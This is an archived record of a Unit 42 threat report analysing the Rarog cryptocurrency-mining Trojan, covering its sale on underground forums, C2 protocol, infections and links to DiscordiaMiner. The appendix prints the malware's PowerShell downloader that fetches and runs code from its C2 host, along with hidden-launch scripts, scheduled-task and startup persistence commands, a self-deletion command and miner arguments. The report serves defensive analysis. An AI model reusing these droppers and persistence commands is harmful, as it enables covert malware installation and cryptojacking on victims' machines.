{
	"id": "b29db048-619c-479e-becc-4a8e33f7531b",
	"created_at": "2026-04-06T00:21:21.062912Z",
	"updated_at": "2026-04-10T03:21:31.345527Z",
	"deleted_at": null,
	"sha1_hash": "909ce64dc0a7f16d06afa64a22c290f3eb1706c5",
	"title": "Smoking Out the Rarog Cryptocurrency Mining Trojan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1364957,
	"plain_text": "Smoking Out the Rarog Cryptocurrency Mining Trojan\r\nBy Unit 42\r\nPublished: 2018-04-04 · Archived: 2026-04-05 15:01:05 UTC\r\nFor the past few months, Unit 42 researchers have investigated a relatively unknown coin mining Trojan that goes by the\r\nname ‘Rarog’.\r\nRarog has been sold on various underground forums since June 2017 and has been used by countless criminals since then.\r\nTo date, Palo Alto Networks has observed roughly 2,500 unique samples, connecting to 161 different command and control\r\n(C2) servers.\r\nRarog has been seen primarily used to mine the Monero cryptocurrency, however, it has the capability to mine others.  It\r\ncomes equipped with a number of features, including providing mining statistics to users, configuring various processor\r\nloads for the running miner, the ability to infect USB devices, and the ability to load additional DLLs on the victim.\r\nRarog is in line with the overall trends we’ve seen regarding the rapidly increasing use of cryptocurrency miners.\r\nAdditionally, Rarog provides an affordable way for new criminals to gain entry into this particular type of malware.\r\nTo date, we have confirmed over 166,000 Rarog-related infections worldwide. The majority of these occur in the\r\nPhilippines, Russia, and Indonesia. While a large number of infections have been recorded by various criminals who have\r\nused this mining Trojan, we have seen very little recorded profits: the highest profits we have observed amount to roughly\r\nUS $120.\r\nThe Trojan itself is likely named after a “Raróg”, a fire demon that originates in Slavic mythology and is typically\r\nrepresented as a fiery falcon.\r\n  Rarog on the Underground\r\nThe Rarog Trojan originated on various Russian-speaking criminal underground sites in June 2017, as shown in the image\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 1 of 14\n\nbelow:\r\nFigure 1 Posting in Russian underground forum for Rarog malware\r\nThe malware sells for 6,000 Rubles, or roughly US $104 at today’s exchange rates. Additionally, a guest administration\r\npanel is provided to allow potential buyers the chance to do a “test drive” by interacting with the interface. This interface\r\nmay be seen below:\r\nFigure 2 Rarog administration panel\r\nNote the two Twitter handles shown in the administration panel above. The first handle, “arsenkooo135”, is the same handle\r\nused in various postings for this malware family, including the one shown in Figure 1. We observed the second handle,\r\n“foxovsky”, interacting with other security researchers online. We also tied this handle to a GitHub repository with the same\r\nhandle that hosts various other malware families. Evidence suggests that these two individuals are the ones behind this\r\nthreat.\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 2 of 14\n\nFigure 3 Foxovsky handle on Twitter interacting with security researchers regarding the Rarog malware family\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 3 of 14\n\nFigure 4 Foxovsky’s GitHub profile, hosting various malware families\r\nAdditionally, we have seen the “foxovsky” account on GitHub host the Rarog malware family on his or her GitHub account.\r\n  Rarog Malware Family\r\nAt a very high level, the Rarog Mining Trojan performs the following actions:\r\nFigure 5 Rarog flow of execution\r\nThe malware comes equipped with a number of features. It uses multiple mechanisms to maintain persistence on the\r\nvictim’s machine, including the use of the Run registry key, scheduled tasks, and shortcut links in the startup folder. At its\r\ncore, Rarog is a coin mining Trojan and gives the attackers the ability to not only download mining software but configure it\r\nwith any parameters they wish. They’re also able to easily throttle the mining software based on the victim machine’s\r\ncharacteristics.\r\nIn addition to coin mining, Rarog also employs a number of botnet techniques. It allows the attackers to perform a number\r\nof actions, such as downloading and executing other malware, levying DDoS attacks against others, and updating the Trojan,\r\nto name a few. Throughout the malware’s execution, a number of HTTP requests are made to a remote C2 server. An\r\noverview of all of these URIs and their description may be found below:\r\nURI Description\r\n/2.0/method/checkConnection To ensure the remote server is responding as expected.\r\n/2.0/method/config Get arguments to supply to miner program.\r\n/2.0/method/delay Retrieve time to sleep before executing miner program.\r\n/2.0/method/error Retrieve information about error message to display to the victim.\r\n/2.0/method/get Get location of miner file based on CPU architecture of victim.\r\n/2.0/method/info Get exe name of miner program.\r\n/2.0/method/setOnline Update statistics for victim on C2 server.\r\n/2.0/method/update Used for updating the Rarog Trojan\r\n/4.0/method/blacklist\r\nRetrieve a list of process names to check against. Should any be running in the\r\nforeground, Rarog will suspend mining operations.\r\n/4.0/method/check Query remote C2 server to determine if ID exists.\r\n/4.0/method/cores Retrieve percentage of CPU to use on victim machines for mining.\r\n/4.0/method/installSuccess Query the C2 server for botnet instructions.\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 4 of 14\n\n/4.0/method/modules Retrieve third-party modules to load on victim.\r\n/4.0/method/threads\r\nDetermine what tasks to run on the victim machine (USB spreading, helper\r\nexecutables, etc.)\r\n \r\nFor additional information on how the Rarog malware family operations, please refer to the Appendix.\r\n  Victim Telemetry\r\nWe identified a total of 161 C2 servers communicating with the Rarog malware family. A full list may be found in the\r\nAppendix. Looking at the geographic distribution of these C2 servers, we see a high concentration of them located in Russia\r\nand Germany.\r\nFigure 6 Distribution of C2 servers hosting Rarog malware\r\nThe distribution rate of new Rarog samples has varied in the past nine months, with a large spike occurring between late\r\nAugust to late September of 2017. At its peak, we encountered 187 unique Rarog samples during the week of September 11,\r\n2017.\r\n \r\nFigure 7 New Rarog malware samples encountered over time\r\nThese samples confirm at least 166,000 victims spread across the globe. While infections occur in most regions of the world,\r\nhigh concentrations occur in the Philippines, Russia, and Indonesia, as seen in the figure below:\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 5 of 14\n\nFigure 8 Rarog infections across the globe\r\nRarog is able to provide telemetry those that have purchased it using the third-party MinerGate mining service. A number of\r\nMinerGate API keys were able to be retrieved, however, the profits made by these attackers were minimal at best. The most\r\nprofitable attacker was found to generate roughly 0.58 Monero (XMR), and 54 ByteCoin (BCN). By today’s exchange rates,\r\nthis amounts to $123.68 total. After factoring in the cost of the malware itself at $104, the attackers in question have\r\ngenerated very little income. In most cases, they’ve lost money.\r\n  Ties to Previous Malware Families\r\nIn late October 2017, Kaspersky wrote a blog post about a malware family named ‘DiscordiaMiner’. In this blog post, they\r\ndescribe a cryptocurrency miner that shared a number of characteristics with Rarog. Upon further inspection, they mention\r\nthe author of the program, who is none other than the previously mentioned “foxovsky” user. Indeed, when looking at this\r\nuser’s GitHub account in Figure 4, we saw the source code to this mining Trojan. The last time the source code to this\r\nparticular malware was updated was on May 25th, 2017.\r\nLooking at the source code to DiscordiaMiner, we see a large number of similarities with Rarog. So many in fact, that we\r\nmight reach the conclusion that Rarog is an evolution of Discordia. Kaspersky’s blog post discussed some drama concerning\r\nthis particular malware family on various underground forums. Accusations were made against the Trojan’s author with\r\nsubstituting customer’s cryptocurrency wallet addresses with his own. This dispute is what ultimately led foxovsky to open-source the DiscordiaMiner program on GitHub. The timeline of when Rarog was first advertised in June 2017, as well as the\r\ntime DiscordiaMiner was last updated in May 2017, paints, and interesting picture. Based on this information, as well as the\r\nheavy code overlap made between the malware families, I suspect that foxovsky rebranded DiscordiaMiner to Rarog and\r\ncontinued development on this newly named malware family. This re-branding allowed him to get away from the negativity\r\nthat was associated with DiscordiaMiner.\r\n  Conclusion\r\nThe Rarog malware family represents a continued trend toward the use of cryptocurrency miners and their demand on the\r\ncriminal underground. While not incredibly sophisticated, Rarog provides an easy entry for many criminals into running a\r\ncryptocurrency mining botnet. The malware has remained relatively unknown for the past nine months barring a few\r\nexceptions. As the value of various cryptocurrencies continues to remain high, it is likely that we’ll continue to see\r\nadditional malware families with mining functionality surface.\r\nPalo Alto Networks customers are protected against this threat in the following ways:\r\nAll samples referenced in this blog post are appropriately marked as malicious in WildFire and Traps\r\nAll domains used as C2 servers for Rarog are flagged as malicious\r\nTracking of the Rarog malware family may be done through the AutoFocus Rarog tag\r\nAppendix\r\n \r\nTechnical Malware Analysis\r\nThe file with the following properties was used to conduct this analysis:\r\nMD5 15361551cb2f705f80e95cea6a2a7c04\r\nSHA1 a388e464edeb8230adc955ed6a78540ed1433078\r\nSHA256 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a\r\nCompile Time 2018-03-17 16:36:18 UTC\r\nPDB String D:\\Work\\_Rarog\\Release\\Rarog.pdb\r\n \r\nWhen Rarog is initially executed, the malware will look for the existence of the following file:\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 6 of 14\n\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nIn the event this file is missing on the system, Rarog will enter its installation routine, which is outlined below.\r\n  Installation Routine\r\nThe installation routine begins by creating the following hidden directory path:\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\\r\nIt then copies itself to the directory above with a filename of ‘Isass.exe’. This newly copied file is then executed in a new\r\nprocess. After this takes place, the malware makes a HTTP POST request as follows:\r\nPOST /2.0/method/checkConnection HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 0\r\nHost: api.polotreck[.]xyz\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:34:10 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 12\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nc3VjY2Vzcw==\r\nThe response of the above request is simply base64-encoded and decodes to ‘success’. The response is checked, and if the\r\nresponse of ‘success’ is received, the malware proceeds.\r\nThe malware makes the following request to determine if the C2 wishes the malware to spawn a fake error message box:\r\nPOST /2.0/method/error HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 9\r\nHost: api.polotreck[.]xyz\r\nprofile=1\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:43:58 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 192\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nVary: Accept-Encoding\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 7 of 14\n\nMTsxO1N5c3RlbSBFcnJvcjtUaGUgcHJvZ3JhbSBjYW4ndCBzdGFydCBiZWNhdXNlIE1TVkNQMTEwLmRsbCBpcyBtaXNzaW5nIGZyb20geW\r\nThe base64 response above decodes to the following:\r\n“1;1;System Error;The program can't start because MSVCP110.dll is missing from your computer. Try reinstalling the\r\nprogram to fix this problem.”\r\nThe response is split by ‘;’. The first parameter is hardcoded, while the second is used to specify the type of message box to\r\ndisplay. The following options are provided:\r\nParameter MessageBox Option\r\n0 No error message displayed.\r\n1 A stop-sign icon appears in the message box.\r\n2 A question-mark icon appears in the message box.\r\n3 An exclamation-point icon appears in the message box.\r\n4 An icon consisting of a lowercase letter i in a circle appears in the message box.\r\nThe third parameter specifies the title of the message box, while the last parameter represents the message. Using the\r\nexample previously, we are presented with the following message:\r\nFigure 9 Fake error message box displayed by Rarog\r\nFinally, Rarog will execute the following command, which will kill the current malware instance, and deleting it from disk.\r\ncmd.exe /c taskkill /im 73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe /f \u0026 erase\r\nC:\\Users\\Administrato\\Desktop\\73222ff531ced249bf31f165777696bb20c42d2148938392335f97f5d937182a.exe \u0026\r\nexit\r\n \r\nPost-Installation Routine\r\nAfter the installation routine completes and a new instance of Isass.exe is spawned, this new instance of Rarog will check\r\nfor the existence of the following file:\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\driver.dat\r\nIf this file does not exist, Rarog will create the necessary hidden directory structure, and make a series of HTTP POST\r\nrequests. The first request will be to ‘/2.0/method/checkConnection’ to ensure the remote C2 server is alive. The second\r\nrequest is to the following:\r\nPOST /4.0/method/installSuccess HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 9\r\nHost: api.polotreck[.]xyz\r\nbuildID=5.1\u0026hwid={1efdb526-2d21-11e8-a30c-8c8590105ceb}\u0026profile=1\u0026os=Microsoft Windows 7 Ultimate\r\n\u0026platform=x86\u0026processor=Intel(R) Core(TM) i7-7700HQ CPU @ 2.80 GHz\u0026videocard=VMware SVGA 3D\r\nHTTP/1.1 200 OK\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 8 of 14\n\nServer: nginx/1.13.9\r\nDate: Tue, 20 Mar 2018 16:43:58 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 192\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\n250\r\nThe response provided by the C2 server is the stored identifier of the victim within the C2 database. This number is stored in\r\nthe ‘driver.dat’ file.\r\nThe following registry key is created to ensure Rarog persists across reboots:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_Antimalware_Host_Syst -\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nThe following hidden directory is created, and the following three files are written to this location:\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nC:\\ProgramData\\WindowsAppCertification\\cert.cmd\r\nC:\\ProgramData\\WindowsAppCertification\\checker.vbs\r\nThe contents of WindowHelperStorageHostSystemThread.ps1 is as follows:\r\n \r\n$path = 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\'\r\n$fpath = $path + 'Isass.exe'\r\n$furl = 'http://api.polotreck[.]xyz/2.0/method/update'\r\n$isfile = Test-Path $fpath\r\nif($isfile -eq 'True') {}\r\nelse{\r\nNew-Item -ItemType directory -Path $path\r\n$WebClient = New-Object System.Net.WebClient\r\n$WebClient.DownloadFile($furl,$fpath)\r\nStart-Process -FilePath $fpath}\r\nThe contents of cert.cmd is as follows:\r\n@echo off\r\npowershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nThe contents of checker.vbs is as follows:\r\nSet WshShell = CreateObject(\"WScript.Shell\")\r\nWshShell.Run \"C:\\ProgramData\\WindowsAppCertification\\cert.cmd\",0\r\nThe following command is executed to create a Scheduled Task to run the checker.vbs script periodically:\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 9 of 14\n\nschtasks.exe /Create /SC MINUTE /MO 30 /TN \"Windows_Antimalware_Host\" /TR\r\n\"C:\\ProgramData\\WindowsAppCertification\\checker.vbs\" /F\r\nThe following command is executed to create a Scheduled Task to run Isass.exe periodically:\r\nschtasks.exe /Create /SC MINUTE /MO 5 /TN \"Windows_Antimalware_Host_Systm\" /TR\r\n\"C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\" /F\r\nAdditionally, the following command is executed to generate a shortcut link in the victim’s startup folder:\r\ncmd.exe /c echo Set oWS = WScript.CreateObject(\"WScript.Shell\") \u003e CreateShortcut.vbs \u0026 echo sLinkFile =\r\n\"%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Isass.lnk\" \u003e\u003e\r\nCreateShortcut.vbs \u0026 echo Set oLink = oWS.CreateShortcut(sLinkFile) \u003e\u003e CreateShortcut.vbs \u0026 echo\r\noLink.TargetPath = \"C:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\" \u003e\u003e CreateShortcut.vbs \u0026\r\necho oLink.Save \u003e\u003e CreateShortcut.vbs \u0026 cscript CreateShortcut.vbs \u0026 del CreateShortcut.vbs\r\nThese various registry modifications, file modifications, and commands executed provides multiple ways for Rarog to\r\npersist on the system both across reboots, as well as in instances where the malware dies or is forcibly closed.\r\nRarog then makes the following POST request to ensure the ID exists on the remote C2 server:\r\nPOST /4.0/method/check HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Tue, 20 Mar 2018 20:47:52 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 12\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nc3VjY2Vzcw==\r\nAgain, Rarog looks for a response of 'success'. Rarog continues to make the following POST request:\r\nPOST /4.0/method/threads HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 0\r\nHost: api.polotreck[.]xyz\r\nHTTP/1.1 200 OK\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 10 of 14\n\nServer: nginx/1.13.10\r\nDate: Tue, 20 Mar 2018 20:49:46 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 16\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nMjsxOzE7MTsyOw==\r\nThe decoded response by the C2 server is ‘2;1;1;1;2;’. This data is split via ‘;’ and the values are used to indicate whether\r\ncertain Rarog features are enabled or not. The value of ‘1’ represents ‘On’, while anything else represents ‘Off’.\r\nPosition Name Description\r\n0\r\nUSB\r\nDevices\r\nSearches the machine for removable drives. Copies Rarog to the removable drive with the\r\nname of 'autorun.exe'. Also creates an 'autorun.inf' file in the same directory, which will\r\nexecute 'autorun.exe' when loaded.\r\n1 Helpers\r\nCreates the hidden 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\' directory, and\r\ncopies Isass.exe to 'SecurityHeaIthService.exe', 'SystemldleProcess.exe', and 'winIogon.exe' in\r\nthis directory.\r\n2 Mining\r\nStatus\r\nMakes a POST request to '/2.0/method/get' to retrieve a URL for a mining executable. This file\r\nis stored in the 'C:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\'\r\ndirectory.\r\n3\r\nMiners\r\nKiller\r\nMakes a POST request to '/4.0/method/modules'. This provides a list of DLLs that are placed in\r\nthe 'C:\\ProgramData\\MicrosoftCorporation\\Windows\\Modules\\' folder. These DLLs are then\r\nloaded by Rarog. The DLLs in question are expected to have an export function named\r\n'Instance'.\r\n4\r\nTask\r\nManager\r\nThis does not appear to be used by the malware.\r\n \r\nWhen the ‘Mining Status’ option is enabled, and a miner is successfully downloaded from a remote server, Rarog will make\r\nthe following request to the C2 server:\r\nPOST /2.0/method/config HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 16:55:38 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 108\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nVary: Accept-Encoding\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 11 of 14\n\nLW8geG1yLnBvb2wubWluZXJnYXRlLmNvbTo0NTU2MCAtdSBtb3JlMnNldEBwcm90b25tYWlsLmNvbSAtcCB4IC1rIC10IHtUSFJFQURTfQ\r\nThe response decodes to the following:\r\no xmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t {THREADS}\r\nThese parameters will be supplied to the mining program upon execution. Prior to running the miner, Rarog will check the\r\nrunning processes on the system for the following strings. Should they be encountered, the processes will be killed, and the\r\nexecutable will be deleted from the system.\r\nminergate\r\nstratum\r\ncryptonight\r\nmonerohash\r\nnicehash\r\ndwarfpool\r\nsuprnova\r\nnanopool\r\nxmrpool\r\nThese strings represent common strings associated with mining pools used by individuals when mining various\r\ncryptocurrencies.\r\nRarog will make the following request to determine how much of a percentage of the victim’s CPU to use for mining:\r\nPOST /4.0/method/cores HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 17:03:18 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 4\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nNTA=\r\nThe response decodes to a value of ‘50’. Rarog continues to make a request to ‘/4.0/method/blacklist’ determine what\r\nprocesses should be blacklisted. The server in question did not have a configured blacklist, but an example of what may be\r\nreturned is shown below:\r\ndota2.exe;csgo.exe;WorldOfTanks.exe;TslGame.exe;gta5.exe;photoshop.exe;vegas_pro.exe;premier.exe;Prey.exe;Overwatch.exe;MK10.exe;Minecr\r\nThis list represents common resource-intensive applications, such as games, that Rarog will continually monitor for. In the\r\nevent such a program is running in the foreground, Rarog will suspend mining operations.\r\nThe malware then makes the following request to retrieve the amount of time that Rarog will sleep before mining on the\r\ntarget victim:\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 12 of 14\n\nPOST /2.0/method/delay HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 6\r\nHost: api.polotreck[.]xyz\r\nid=250\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nDate: Wed, 21 Mar 2018 17:11:05 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 5\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\n10000\r\nPrior to continuing, Rarog will check the running processes on the system for the following common security applications,\r\nand will not proceed if found:\r\nNetMonitor\r\nTaskmgr.exe\r\nProcess Killer\r\nKillProcess\r\nSystem Explorer\r\nAnVir\r\nProcess Hacker\r\nRarog takes the previously collected CPU usage percentage and applies it against the number of CPUs found on the system.\r\nAs an example, if a system had four CPU cores, and the setting was at 50%, Rarog could configure the miner to use 2\r\nthreads (0.5 x 4). The following mining command is executed by Rarog:\r\nC:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\xmrig32.exe -o\r\nxmr.pool.minergate[.]com:45560 -u more2set@protonmail[.]com -p x -k -t 1\r\n \r\nBotnet Functionality\r\nRarog will periodically make HTTP POST requests to the following:\r\nPOST /2.0/method/setOnline HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0\r\nContent-Length: 16\r\nHost: api.polotreck[.]xyz\r\nid=250\u0026build=5.1\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.13.10\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 13 of 14\n\nDate: Wed, 21 Mar 2018 17:28:27 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 0\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.6.30-0+deb8u1\r\nThis particular URI has the ability to provide additional tasks for Rarog to perform. The following list of supported\r\ncommands are included:\r\nCommand Description\r\ninstall Download and execute specified file\r\nopen_url Open the specified URL in browser\r\nddos Perform DDoS operations against specified target\r\nupdate Update Rarog Trojan from specified URL\r\nrestart_bot Restart Rarog Trojan\r\ndelete_bot Delete Rarog Trojan\r\n \r\nSHA256 Hashes\r\nFor a full list of SHA256 hashes and their first encountered timestamp, please refer to the following file.\r\n  C2 Servers\r\nFor a full list of C2 servers and their first encountered timestamp, please refer to the following file.\r\n  File and Folder Artifacts\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\Isass.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\System32\\_Isass.exe\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\\r\nC:\\ProgramData\\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\\driver.dat\r\nC:\\ProgramData\\WindowsAppCertification\\\r\nC:\\ProgramData\\WindowsAppCertification\\WindowHelperStorageHostSystemThread.ps1\r\nC:\\ProgramData\\WindowsAppCertification\\cert.cmd\r\nC:\\ProgramData\\WindowsAppCertification\\checker.vbs\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\SecurityHeaIthService.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\SystemldleProcess.exe\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Helpers\\winIogon.exe\r\nC:\\ProgramData\\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\\\r\nC:\\ProgramData\\MicrosoftCorporation\\Windows\\Modules\r\n  Registry Artifacts\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows_Antimalware_Host_Syst\r\nSource: https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nhttps://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/"
	],
	"report_names": [
		"unit42-smoking-rarog-mining-trojan"
	],
	"threat_actors": [],
	"ts_created_at": 1775434881,
	"ts_updated_at": 1775791291,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.pdf",
		"text": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.txt",
		"img": "https://archive.orkl.eu/909ce64dc0a7f16d06afa64a22c290f3eb1706c5.jpg"
	}
}